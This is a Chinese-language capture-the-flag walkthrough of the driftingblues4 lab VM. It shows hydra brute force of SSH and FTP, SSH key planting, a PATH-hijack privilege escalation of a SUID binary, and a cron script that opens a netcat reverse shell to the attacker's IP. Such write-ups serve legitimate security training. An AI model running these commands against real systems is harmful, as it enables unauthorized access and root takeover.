攻击者ip:192.168.56.108 桥接(自动) vmare
受害者ip:1192.168.56.126 仅主机 vxbox
主机发现
arp-scan -l
方法一、arp-scan -I eth0 -l (指定网卡扫)方法二、masscan 扫描的网段 -p 扫描端口号masscan 192.168.184.0/24 -p 80,22方法三、netdiscover -i 网卡-r 网段netdiscover -i eth0 -r 192.168.184.0/24
端口扫描
nmap -p- -sV 192.168.56.126
21ftp匿名登陆失败
爆目录,空的
查看源代码,发现base64编码
解码,
接着解码
imfuckingmad.txt
https://ctf.bugku.com/tool/brainfuck
扫描二维码,跳转到https://i.imgur.com/a4JjS76.png,但是网站凉了
看wp的图片
得到用户名
luthergaryHubertclark
爆破ssh
hydra -L use.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.126
hydra -L use.txt -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.126
参数:-l login 小写,指定用户名进行破解-L file 大写,指定用户的用户名字典-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。-P file 大写,用于指定密码字典。-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探-M file 指定目标ip列表文件,批量破解。-o file 指定结果输出文件-f 找到第一对登录名或者密码的时候中止破解。-t tasks 同时运行的线程数,默认是16-w time 设置最大超时时间,单位-v / -V 显示详细过程-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)-x 自定义密码。
luther/mypics
连接ftp
ftp ls:列出当前目录中的文件和子目录。 cd
没啥东西
hubert的uid与其他不一样是1001,这可能是一个用户文件夹
但是里边没有其他东西,连.ssh都没有,可以利用该文件夹,在本地生成秘钥,上传到靶机里
然后可以尝试使用秘钥登录靶机
ssh-keygen 生成密钥
给用户hubert创建.ssh目录,并将authorized_keys塞到里面,给权限
ssh连接获得第一个flag
ssh [email protected] -i id_rsa
查看py文件
提权
find / -perm -u=s -type f 2>/dev/null
发现getinfo
执行了 ip addr, cat /etc/hosts, uname -a
可以修改其中一个命令即可获得root权限
环境变量命令劫持提权
大概的原理就是 执行系统命令所以我们可以自行编写一个同名文件,比如说cat,因为我们猜测getinfo中使用了cat命令,如若我们可以添加环境变量,getinfo在调用命令时首先检索环境变量就会调用到我们伪造的cat,执行我们想要的命令,来达到提权的效果,即使用环境变量进行命令劫持提权因此,在这种情况下,我们可以在环境变量 PATH 中提供一个目录 (/tmp),并创建一个 ip 或者 cat 文件,用于劫持命令,执行我们自定义的二进制文件就可以提权:export PATH=/tmp/:$PATH//把/tmp路径加入到系统路径中。cd /tmpecho '/bin/bash' > ip//把/bin/bash写入到ip中。chmod +x ip//增加执行权限/usr/bin/getinfo
计划任务提权
上传pspy
发现隔了一分钟的emergency.py
删除并新建
#!/usr/bin/pythonimport osos.system('nc -e /bin/bash 192.168.56.108 1111')
提权成功
原文始发于微信公众号(王之暴龙战神):driftingblues4
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论